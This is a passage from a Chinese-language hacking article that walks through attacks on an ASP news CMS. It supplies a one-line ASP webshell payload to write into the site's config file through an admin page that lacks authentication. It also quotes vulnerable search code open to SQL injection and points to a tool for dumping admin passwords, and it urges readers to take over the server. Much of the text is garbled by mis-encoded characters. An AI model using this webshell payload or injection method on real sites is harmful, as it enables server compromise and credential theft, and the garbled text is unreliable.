很熟悉的，就是inc/config.asp里的，我們可以在這寫一句話入庫，當(dāng)然如果有的系統(tǒng)抄襲88red，并且對留言進(jìn)行過濾的話，我們在這個(gè)配置信息里寫入“”%><%execute request(“IloveHackerNoteBook”)%>'”然后就會(huì)把后面的東西全部“格式化”，最后留下了一句“<%execute request(“******”)%>”這樣的話，我們就連接/inc/config.asp或得webshell吧。呵呵，這些都是無稽之談，因?yàn)槲艺f這些是建立在沒有密碼進(jìn)去的時(shí)候，沒鑰匙你怎么進(jìn)去偷錢？（破比方，見笑?。┠俏覀兛纯?，這個(gè)屋子的主人是怎么驗(yàn)證你是他的親戚的？看文件頭有個(gè)session.asp，想必就是驗(yàn)證“血緣”關(guān)系的東西了。嘿嘿，是朋友是敵人，看這個(gè)文件，沒這個(gè)文件誰都能進(jìn)后臺(tái)了，大吃一驚的是……session.asp竟然為空。我不知道這個(gè)系統(tǒng)的作者是怎么寫的，那么要緊的文件吖?。。。『昧撕昧?，人家的門沒有上鎖，進(jìn)去吧。如圖4

撬鎖工具，也沒強(qiáng)迫屋主，就這樣進(jìn)了他的房間（大家千萬別真和我學(xué)著去偷錢拉?。┻@個(gè)比喻只是想讓大家形象點(diǎn)的了解驗(yàn)證是非常嚴(yán)肅的問題。我們可以直接上網(wǎng)站去修改東西也能在本地提交修改，全部都是ok的，我們來測試一下，如圖5

我們先未授權(quán)來到信息參數(shù)設(shè)置，然后用一句話蓋掉當(dāng)前“”%><%execute request(“IloveHackerNoteBook”)%>'”，結(jié)果如圖6

很成功的插進(jìn)了一句話，接著就讓大家把服務(wù)器拿下來吧！3、搜索注入搜索注入，這個(gè)系統(tǒng)估計(jì)是那些剛會(huì)程序的人寫的，新的版本，真正靠自己的實(shí)力寫的代碼，過濾不嚴(yán)也不能利馬責(zé)怪人家，可能下一個(gè)版本會(huì)不錯(cuò)，但是注入仍然存在，這個(gè)是事實(shí)，我們來看看這個(gè)事實(shí)的片斷代碼： 
<% word=request("keyword") ‘客戶端獲取關(guān)鍵詞，注意沒過濾?。?nbsp;if word="" then ‘還不能是空的 response.write"<script language=javascript>alert('關(guān)鍵字不能為空');this.location.href='javascript:history.go(-1)';</script>" response.end end if set rs=server.createobject("adodb.recordset") sql="select * from news where title like '%"&word"%' order by id desc" rs.open sql,conn,1,1 ‘關(guān)鍵詞不為空，就能搜索了。 if rs.eof then response.write"<br><br><div align=center>沒有搜索到新聞</div><br><br>" else%> 
對于搜索型注入大家可以使用NBSI等牛人編寫的工具注入，結(jié)果如圖7

系統(tǒng)，這樣猜解到了賬號(hào)和密碼就能去后臺(tái)登陸了，雖然后臺(tái)沒驗(yàn)證。小小的總結(jié)一下：這個(gè)系統(tǒng)雖然發(fā)布后有點(diǎn)火，我們也該讓程序高興是吧！鼓勵(lì)是種動(dòng)力，否則我們小菜讀什么代碼呢？！總的來說，這個(gè)系統(tǒng)最嚴(yán)重的就是session.asp這個(gè)文件為空導(dǎo)致整個(gè)站不安全的。還有搜索型注入沒過濾好，導(dǎo)致攻擊者能任意獲取賬號(hào)和密碼從而威脅到網(wǎng)站的安全，還有，數(shù)據(jù)庫既然設(shè)置成了asa就得加個(gè)什么干擾的2進(jìn)制數(shù)據(jù)庫進(jìn)去，加載個(gè)nodown表，防止一句話如庫。我不上論壇，但我有博客:www.xshacker.com.cn，歡迎大家和我交流.

最新評論